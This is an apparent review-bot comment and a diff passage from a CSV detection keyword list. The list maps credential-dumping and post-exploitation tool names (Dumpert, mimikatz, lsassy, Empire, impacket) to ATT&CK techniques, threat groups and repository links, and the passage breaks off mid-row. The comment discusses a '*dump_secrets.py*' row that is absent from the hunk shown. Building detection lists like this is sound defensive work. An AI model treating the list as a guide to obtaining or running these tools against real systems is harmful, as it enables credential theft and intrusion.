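Review bot: The `*dump_secrets.py*` row rewritten in this hunk still has a malformed ATT&CK mapping: `metadata_tool_techniques` is `T1587 T1570 T1021 T1072 T1550`, separated by spaces, while every other row in the hunk joins IDs with ` - `, and its `metadata_tool_tactics` is `N/A`. A consumer that splits the field on ` - ` would presumably read the whole string as a single unknown technique, so detections built from this keyword would lose their technique tagging. Since the refresh rewrites the row anyway, I would normalise the field to `"T1587 - T1570 - T1021 - T1072 - T1550"` and fill in the tactics column to match. The row's `metadata_comment` is also `N/A` even though the keyword is a bare script name with proxy detection enabled, so a short note on expected false positives would help whoever triages the hits.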
@@ -9674,103 +9822,104 @@ "*dump_WPA-PMKID-PBKDF2.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*DumpBrowserHistory*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*DumpCreds*","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. 
I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","4","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" -"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" 
+"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
